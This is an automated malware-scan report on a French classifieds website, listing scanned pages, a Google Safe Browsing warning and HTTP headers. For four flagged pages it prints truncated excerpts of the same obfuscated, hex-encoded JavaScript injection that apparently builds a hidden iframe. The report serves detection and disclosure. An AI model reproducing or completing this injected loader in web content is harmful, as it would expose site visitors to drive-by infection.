Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=icijaitout.fr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://icijaitout.fr/ | 200 OK Content-Length: 56741 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq=\"0x\";bv=(5-3-1);sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6e:58:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6e:58:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 Antivirus reports:
| ||
http://icijaitout.fr/js/bookmark.js | 200 OK Content-Length: 5734 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6e:58:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6e:58:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6e:58:25:6a:69 Antivirus reports:
| ||
http://icijaitout.fr/js/javascript.js | 200 OK Content-Length: 17006 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6e:58:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6e:58:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6e:58:25:6a:69 Antivirus reports:
| ||
http://icijaitout.fr/index.php | 200 OK Content-Length: 56741 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq=\"0x\";bv=(5-3-1);sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6e:58:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6e:58:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 Antivirus reports:
| ||
http://icijaitout.fr/deposer-une-petite-annonce.htm | 200 OK Content-Length: 19704 Content-Type: text/html | clean |
http://icijaitout.fr/offres-et-recherches-1.htm | 200 OK Content-Length: 28900 Content-Type: text/html | clean |
http://icijaitout.fr/annonce-1656.htm | 200 OK Content-Length: 14580 Content-Type: text/html | clean |
http://icijaitout.fr/annonces.php?region=17 | 200 OK Content-Length: 18319 Content-Type: text/html | clean |
http://icijaitout.fr/annonces.php?region=17&page=1 | 200 OK Content-Length: 18319 Content-Type: text/html | clean |
http://icijaitout.fr/regles-de-diffusion.htm | 200 OK Content-Length: 13230 Content-Type: text/html | clean |
http://icijaitout.fr/offres-et-recherches-2.htm | 200 OK Content-Length: 8860 Content-Type: text/html | clean |
http://icijaitout.fr/all.php?type=2 | 200 OK Content-Length: 8860 Content-Type: text/html | clean |
http://icijaitout.fr/all.php?type=2&f=1 | 200 OK Content-Length: 8880 Content-Type: text/html | clean |
http://icijaitout.fr/all.php?type=2&f=2 | 200 OK Content-Length: 8880 Content-Type: text/html | clean |
http://icijaitout.fr/informations-legales-cgu.htm | 200 OK Content-Length: 10480 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: icijaitout.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 12 Apr 2014 18:48:05 GMT
Pragma: no-cache
Server: Apache/2.4.9 (Unix)
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=519d025ce44f53a28cfdf2ebcf553593; path=/
X-Powered-By: PHP/4.4.9
GET / HTTP/1.1
Host: icijaitout.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 12 Apr 2014 18:48:05 GMT
Pragma: no-cache
Server: Apache/2.4.9 (Unix)
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=519d025ce44f53a28cfdf2ebcf553593; path=/
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: icijaitout.fr
Referer: http://www.google.com/search?q=icijaitout.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: icijaitout.fr
Referer: http://www.google.com/search?q=icijaitout.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.